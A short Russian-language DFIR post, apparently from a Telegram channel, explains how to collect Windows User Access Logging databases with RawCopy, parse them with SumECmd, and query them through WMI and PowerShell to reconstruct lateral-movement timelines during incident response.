UAL — системный сборщик статистики обращений к серверу по ролям. По-простому: кто, с какого IP и к какому серверу прикладывался в конкретный день. Работает на Windows Server 2012+ и по умолчанию включен на поддерживаемых системах. Полезно для реконструкции латералки и подтверждения "кто куда ходил". 🏃♂️
Где лежит и что даёт ⁉️
• Пути:
C:\Windows\System32\LogFiles\SUM\Current.mdb
C:\Windows\System32\LogFiles\SUM\SystemIdentity.mdb
C:\Windows\System32\LogFiles\SUM\<GUID>.mdb
• Формат: ESE-базы
• Retention: обычно 2–3 года. Current.mdb хранит последние 24 часа, затем данные перекладываются в годовой <GUID>.mdb.
Как аккуратно забрать на живой системе⁉️
Файлы залочены ОС, поэтому берем низкоуровневую копию:
RawCopy.exe /FileNamePath:C:\Windows\System32\LogFiles\SUM\Current.mdb ^
/OutPath:C:\DFIR\SUM\
Дальше парсим. Самые удобные тулзы: Eric Zimmerman SumECmd и Brian Moran KStrike. Пример на SumECmd:
SumECmd.exe -d C:\DFIR\SUM\ --csv C:\DFIR\OUT\
На выходе будут CSV, где по дням видно User → ClientIP → FirstSeen/LastSeen → Role — идеальная основа для таймлайна латералки. 📈
Быстрый опрос без выгрузки 🆒
На live-хосте UAL читается через WMI/PowerShell:
# WMI
gwmi -Namespace "root\AccessLogging" -Query `
"SELECT * FROM MsftUal_DeviceAccess WHERE LastSeen >= '2025-01-01'"
# Cmdlets
Get-UalUserAccess
Get-UalDailyUserAccess
Зачем DFIR-щику ⁉️
• Подтверждаем факты ходок: кто и когда дергал конкретный сервер.
• Строим узлы латералки там, где события RDP/SMB могли "сгореть".
• Сопоставляем роль сервера и характер обращений, чтобы поднять приоритет и зону зачистки.
• Держим историю за 2–3 года — удобно для ретро-поиска повторов и атрибуции.
Нет SIEM? 😆
Не парься, UAL довезет таймлайн 🇵🇰
🐦⬛ DFIR Father | 309 |
